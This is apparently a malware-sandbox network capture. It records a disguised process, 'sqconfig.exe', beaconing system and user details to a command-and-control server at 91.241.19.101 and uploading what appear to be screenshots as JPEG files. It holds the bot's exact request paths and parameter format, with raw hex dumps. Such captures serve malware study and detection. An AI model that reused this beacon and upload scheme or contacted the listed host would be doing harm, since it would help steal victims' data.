                                                                  Sep 30, 2021 23:52:59.242439032 CEST8369OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:52:59.242513895 CEST8395OUTData Raw: b2 8a d8 b8 60 6a b6 6a f8 e9 80 f0 be 8d fe e9 af 3a 8d bf 7a 9f ef 0a eb fc 75 e2 3d 2b 56 b4 b1 b5 d2 8b 98 ad c1 fb cb 8a e1 d6 52 92 23 76 07 26 b9 30 ed aa 56 6b 5d 4f 6e 70 f7 d7 5d 8f 72 f1 11 db 67 a6 7f d7 01 fc 85 73 e4 e6 96 7f 88 5e
                                                                  Data Ascii: `jj:zu=+VR#v&0Vk]Onp]rgs^Kk*17!-7N.JG8Xb8oxk7Qv7?+i:GwS]zI\3?(?jNP):);CsR3r
                                                                  Sep 30, 2021 23:52:59.546967983 CEST8434INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  31192.168.2.34979691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:59.227293015 CEST8363OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:59.437695026 CEST8432INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  32192.168.2.34979991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:59.678493023 CEST8435OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:59.901283026 CEST8456INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  33192.168.2.34980191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:59.866523027 CEST8442OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----0ba936dc8818d7343b7ef1ae30c6903b
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 94387
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:52:59.866641998 CEST8443OUTData Raw: 2d 2d 2d 2d 2d 2d 30 62 61 39 33 36 64 63 38 38 31 38 64 37 33 34 33 62 37 65 66 31 61 65 33 30 63 36 39 30 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------0ba936dc8818d7343b7ef1ae30c6903bContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:52:59.866811037 CEST8453OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:52:59.866858959 CEST8454OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:52:59.866878986 CEST8455OUTData Raw: 87 b5 97 62 85 2d 5e 8b 44 d5 e7 5b b6 87 4b be 91 6c 89 17 45 2d 9c 88 31 9c ef c0 f9 71 83 d7 1d 0d 51 15 ba 69 ec 65 66 82 8a 5a b4 9a 56 a3 26 9b 26 a6 9a 7d db d8 46 db 5e e9 60 63 12 9e 06 0b e3 00 f2 3b f7 14 13 b9 52 bd a7 e1 c7 c4 8d 2b
                                                                  Data Ascii: b-^D[KlE-1qQiefZV&&}F^`c;R+7*OG(9k'Y-iK|9Vw.7ybcxIUK[X4ee-oC9%iVT(ld T<t@lF46
                                                                  Sep 30, 2021 23:52:59.991106987 CEST8474OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:52:59.991164923 CEST8477OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:52:59.991180897 CEST8479OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:52:59.991220951 CEST8482OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:52:59.991839886 CEST8489OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:52:59.991889954 CEST8494OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:00.430099964 CEST8600INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:00 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Sep 30, 2021 23:53:00.468782902 CEST8601OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:00.645138979 CEST8602INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:00 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  34192.168.2.34980291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:00.144608974 CEST8575OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:00.356139898 CEST8599INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:00 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  35192.168.2.34980591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:00.784495115 CEST8609OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----0ba936dc8818d7343b7ef1ae30c6903b
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 94387
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:00.784749031 CEST8610OUTData Raw: 2d 2d 2d 2d 2d 2d 30 62 61 39 33 36 64 63 38 38 31 38 64 37 33 34 33 62 37 65 66 31 61 65 33 30 63 36 39 30 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------0ba936dc8818d7343b7ef1ae30c6903bContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:00.785094976 CEST8620OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:00.785332918 CEST8622OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:00.925604105 CEST8646OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:00.925729990 CEST8654OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:00.925801039 CEST8658OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:00.926047087 CEST8661OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:53:01.063487053 CEST8702OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:01.063613892 CEST8707OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:53:01.064353943 CEST8728OUTData Raw: 15 bf e2 75 ce a0 bf ee 0a c6 58 ce 2b 97 0a ff 00 75 11 e3 22 dd 66 43 8e 69 c0 73 de a6 11 7b 54 8b 03 1e 8a 6b 67 34 8c 15 29 3e 85 60 b4 e0 86 ae a5 94 ad d1 1b f2 ab 09 a5 5c 3f fc b3 6a cd d6 8a dd 9b 47 0f 37 d0 cc 09 52 04 f6 ad 75 d1 67
                                                                  Data Ascii: uX+u"fCis{Tkg4)>`\?jG7Rug WHUY2/Y<LVf(OjxLViSYK}*}LA-33RZu&/6=j&<W_Ua4T'__k){:~l7pL2c
                                                                  Sep 30, 2021 23:53:01.381488085 CEST8755INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:01 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  36192.168.2.34980791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:00.887878895 CEST8631OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:01.101481915 CEST8747INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:01 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  37192.168.2.34980991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:01.339015007 CEST8755OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:01.529970884 CEST8758INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:01 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:01.573647976 CEST8758OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----f829aff7373c846bd704df066d49d369
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 94389
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:01.573726892 CEST8758OUTData Raw: 2d 2d 2d 2d 2d 2d 66 38 32 39 61 66 66 37 33 37 33 63 38 34 36 62 64 37 30 34 64 66 30 36 36 64 34 39 64 33 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------f829aff7373c846bd704df066d49d369Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:01.573899031 CEST8768OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:01.584469080 CEST8771OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:01.695460081 CEST8781OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:01.695521116 CEST8786OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:01.695626020 CEST8799OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
